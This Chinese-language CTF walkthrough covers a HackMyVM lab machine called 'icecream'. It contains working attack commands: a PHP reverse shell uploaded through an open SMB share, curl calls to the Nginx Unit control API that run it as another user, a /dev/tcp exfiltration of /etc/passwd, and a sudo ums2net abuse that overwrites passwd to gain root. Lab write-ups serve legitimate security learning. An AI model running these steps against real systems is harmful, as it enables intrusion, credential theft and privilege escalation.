信息收集

服务探测

访问80咋是403，再看看其他的信息

❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
You miss 100% of the ports you don't scan. - RustScan

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.113:22
Open 192.168.56.113:80
Open 192.168.56.113:139
Open 192.168.56.113:445
Open 192.168.56.113:9000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-12 16:49 CST
Initiating Ping Scan at 16:49
Scanning 192.168.56.113 [4 ports]
Completed Ping Scan at 16:49, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:49
Completed Parallel DNS resolution of 1 host. at 16:49, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:49
Scanning 192.168.56.113 [5 ports]
Discovered open port 445/tcp on 192.168.56.113
Discovered open port 80/tcp on 192.168.56.113
Discovered open port 9000/tcp on 192.168.56.113
Discovered open port 139/tcp on 192.168.56.113
Discovered open port 22/tcp on 192.168.56.113
Completed SYN Stealth Scan at 16:49, 0.04s elapsed (5 total ports)
Nmap scan report for 192.168.56.113
Host is up, received reset ttl 63 (0.00060s latency).
Scanned at 2024-12-12 16:49:08 CST for 0s

PORT     STATE SERVICE      REASON
22/tcp   open  ssh          syn-ack ttl 63
80/tcp   open  http         syn-ack ttl 63
139/tcp  open  netbios-ssn  syn-ack ttl 63
445/tcp  open  microsoft-ds syn-ack ttl 63
9000/tcp open  cslistener   syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
           Raw packets sent: 9 (372B) | Rcvd: 6 (260B)

不过9000端口可以正常访问，拿到一个json数据，看服务名字是cslinstener类似什么监听

{
    "certificates": {},
    "js_modules": {},
    "config": {
        "listeners": {},
        "routes": [],
        "applications": {}
    },
    "status": {
        "modules": {
            "python": {
                "version": "3.11.2",
                "lib": "/usr/lib/unit/modules/python3.11.unit.so"
            },
            "php": {
                "version": "8.2.18",
                "lib": "/usr/lib/unit/modules/php.unit.so"
            },
            "perl": {
                "version": "5.36.0",
                "lib": "/usr/lib/unit/modules/perl.unit.so"
            },
            "ruby": {
                "version": "3.1.2",
                "lib": "/usr/lib/unit/modules/ruby.unit.so"
            },
            "java": {
                "version": "17.0.11",
                "lib": "/usr/lib/unit/modules/java17.unit.so"
            },
            "wasm": {
                "version": "0.1",
                "lib": "/usr/lib/unit/modules/wasm.unit.so"
            },
            "wasm-wasi-component": {
                "version": "0.1",
                "lib": "/usr/lib/unit/modules/wasm_wasi_component.unit.so"
            }
        },
        "connections": {
            "accepted": 0,
            "active": 0,
            "idle": 0,
            "closed": 0
        },
        "requests": {
            "total": 0
        },
        "applications": {}
    }
}

这个json数据看出像是描述系统状态用了一些modules模块，其中config字段中包含了关于监听器、路由和应用程序的配置信息

尝试在9000端口扫一下目录

❯ gobuster dir -u http://$ip:9000 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.113:9000
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/config               (Status: 200) [Size: 62]
/status               (Status: 200) [Size: 862]
/certificates         (Status: 200) [Size: 4]

访问/config，也没啥信息，跟上面一样的

{
    "listeners": {},
    "routes": [],
    "applications": {}
}

换个方向，看看smb里面能否访问，看着好像是/tmp目录

❯ smbclient -N -L  //$ip

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        icecream        Disk      tmp Folder
        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
        nobody          Disk      Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.56.113 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
❯ smbclient -N   //$ip/icecream
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Dec 12 16:39:01 2024
  ..                                  D        0  Sun Oct  6 18:06:38 2024
  .font-unix                         DH        0  Thu Dec 12 16:22:07 2024
  systemd-private-7e87a6a94eb84f99a8fed57a685b389e-systemd-timesyncd.service-HzwZ4S      D        0  Thu Dec 12 16:22:07 2024
  .XIM-unix                          DH        0  Thu Dec 12 16:22:07 2024
  .ICE-unix                          DH        0  Thu Dec 12 16:22:07 2024
  systemd-private-7e87a6a94eb84f99a8fed57a685b389e-systemd-logind.service-ecsU5G      D        0  Thu Dec 12 16:22:08 2024
  .X11-unix                          DH        0  Thu Dec 12 16:22:07 2024

                19480400 blocks of size 1024. 16161228 blocks available

试着传个rev.php

❯ smbclient -N   //$ip/icecream
Try "help" to get a list of possible commands.
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (157.9 kb/s) (average 157.9 kb/s)
smb: \> ls
  .                                   D        0  Thu Dec 12 17:07:04 2024
  ..                                  D        0  Sun Oct  6 18:06:38 2024
  .font-unix                         DH        0  Thu Dec 12 16:22:07 2024
  systemd-private-7e87a6a94eb84f99a8fed57a685b389e-systemd-timesyncd.service-HzwZ4S      D        0  Thu Dec 12 16:22:07 2024
  .XIM-unix                          DH        0  Thu Dec 12 16:22:07 2024
  .ICE-unix                          DH        0  Thu Dec 12 16:22:07 2024
  systemd-private-7e87a6a94eb84f99a8fed57a685b389e-systemd-logind.service-ecsU5G      D        0  Thu Dec 12 16:22:08 2024
  .X11-unix                          DH        0  Thu Dec 12 16:22:07 2024
  php-reverse-shell.php               A     5496  Thu Dec 12 17:07:04 2024

                19480400 blocks of size 1024. 16161216 blocks available

回头访问一下http://$ip/php-reverse-shell.php，拿到shell了

❯  curl $ip/php-reverse-shell.php
----------------分隔线------------
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.113] 36242
Linux icecream 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64 GNU/Linux
 10:12:59 up 50 min,  0 user,  load average: 0.00, 0.00, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

用户提权

看了一下用户，发现ice用户，sudo权限也没有

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
ice:x:1000:1000:ice,,,:/home/ice:/bin/bash
unit:x:999:995:unit user:/nonexistent:/bin/false

就差9000端口没有利用上了，传个pspy64看看有没有什么定时任务

$ cd /tmp
$ wget 192.168.56.102/pspy64
--2024-12-12 10:21:31--  http://192.168.56.102/pspy64
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: 'pspy64'
$ chmod +x pspy64
$ ./pspy64

可以看到一个任务会被执行，还是ice用户，执行一个unit:main，并且监听了9000端口

1	2024/12/13 12:12:37 CMD: UID=0 PID=378 \| unit: main v1.33.0 [/usr/sbin/unitd --control 0.0.0.0:9000 --user ice]

那就符合预期的猜想了，不过这个9000端口怎么利用呢，搜了一下，是个Nginx Unit

不想花时间看官方文档了，直接让GPT解释一下吧，可以通过HTTP API进行配置

让GPT写一下创建applications，但需要稍微修改一下端口还有其他字段，因为我的反弹shell是php文件，所以type改为php

当我PUT参数上去时就能创建成功了

❯ curl -X PUT http://192.168.56.113:9000/config/applications \
-d '{"app":{"type":"php","root":"/tmp","script":"php-reverse-shell.php"}}'
{
        "success": "Reconfiguration done."
}

❯ curl -X PUT -d '[{"action":{"share":"/tmp/php-reverse-shell.php$uri","fallback":{"pass":"applications/app"}}}]' http://192.168.56.113:9000/config/routes
{
        "success": "Reconfiguration done."
}
❯ curl -X PUT -d '{"*:8888":{"pass":"routes"}}' http://192.168.56.113:9000/config/listeners
{
        "success": "Reconfiguration done."
}

最后的config如图

同时你监听php-reverse-shell.php中的端口，访问一下http://192.168.56.113:8888

就可以成果拿到ice的shell了

Root提权

ice@icecream:/$ sudo -l
sudo -l
Matching Defaults entries for ice on icecream:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User ice may run the following commands on icecream:
    (ALL) NOPASSWD: /usr/sbin/ums2net

发现ice用户有个sudo权限

可以执行ums2net，但是不知道这是个什么玩意，查询得知是个USB存储可以通过网络连接的工具

grandpaul/ums2net — grandpaul/ums2net

那我们就根据配置文件来创建一行，脚本本意是写入到USB存储器的，但我们没有存储器，直接写到系统文件里，比如sudoers、passwd文件都行，把of=改一下即可

我们尝试修改一下passwd只取root这一行，把第二个字段的x删掉

ice@icecream:/$ cat /etc/passwd > /dev/tcp/192.168.56.102/1234
-------------------------分隔------------------------
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lnvp 1234>passwd
listening on [any] 1234 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.113] 52296
┌──(kali㉿kali)-[~]
└─$ vim passwd
┌──(kali㉿kali)-[~]
└─$ cat passwd
root::0:0:root:/root:/bin/bash
------------------------分隔-------------------------------
ice@icecream:/tmp$ echo '6666 of=/etc/passwd bs=4096' > config
ice@icecream:/tmp$ sudo /usr/sbin/ums2net -c config -d
ums2net[1037]: Totally write 31 bytes to /etc/passwd
------------------------分隔-----------------------------
┌──(kali㉿kali)-[~]
└─$ nc -v 192.168.56.113 6666 < passwd
192.168.56.113: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.56.113] 6666 (?) open
^C

将passwd通过端口6666再次写回靶机

断开shell重连直接su即可切换root用户，忘记读user了，一次性全读了

ice@icecream:/$ su
root@icecream:/# id
uid=0(root) gid=0(root) grupos=0(root)
root@icecream:~# cat /home/ice/user.txt
HMVaneraseroflove
root@icecream:~# cat root.txt
HMViminvisible